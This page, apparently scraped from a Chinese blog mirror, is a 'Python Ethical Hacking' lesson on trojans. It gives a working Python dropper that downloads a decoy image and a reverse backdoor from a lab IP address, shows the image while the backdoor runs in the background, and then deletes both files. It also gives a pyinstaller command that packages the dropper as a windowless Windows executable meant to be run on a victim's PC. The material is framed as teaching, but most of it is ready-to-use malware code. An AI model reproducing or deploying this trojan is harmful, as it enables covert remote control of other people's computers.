zoukankan      html  css  js  c++  java
  • Python Ethical Hacking

    TROJANS

    A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc).

    When executed:

    1. Opens the normal file that the user expects.

    2. Executes evil code in the background (run a backdoor/keylogger ..etc).

    Download & Execute Payload

    • A generic executable that downloads & executes files.
    • Ideas:
    • Download backdoor + keylogger.
      • Download keylogger + password recovery tool.
      • Download keylogger + password recovery tool + backdoor.
      • Use it as a trojan -- evil file + a normal file.

    Create the download_and_exeucte Python code:

    #!/usr/bin/env python
    import os
    import subprocess
    import requests
    import tempfile
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    temp_directory = tempfile.gettempdir()
    os.chdir(temp_directory)
    print(temp_directory)
    
    download("http://10.0.0.43/evil-files/Galaxy.jpg")
    subprocess.Popen("Galaxy.jpg", shell=True)
    
    download("http://10.0.0.43/evil-files/reverse_backdoor.exe")
    subprocess.call("reverse_backdoor.exe", shell=True)
    
    os.remove("Galaxy.jpg")
    os.remove("reverse_backdoor.exe")

    Convert the Python Program to Windows Executable.

    wine /root/.wine/drive_c/Program Files (x86)/Python37-32/Scripts/pyinstaller.exe download_and_execute.py --onefile --noconsole

     Execute the download_and_execute.exe file on the vitim PC.

     The user can only see a normal picture, but the communication has been established background.

     

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    Apple Developer Program Roles Overview
    iOS 使用UIView的一种有效方法
    百度面试(转)
    iOS 冒泡排序
    iOS 面试题及答案
    iOS 开发进程与线程
    iOS 应用内跳转到appstore里下载
    iOS 使用封装的NSLog来打印调试信息
    iOS 并发编程指南
    苹果App Store审核指南中文翻译(2014.9.1更新)
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11666318.html
Copyright © 2011-2022 走看看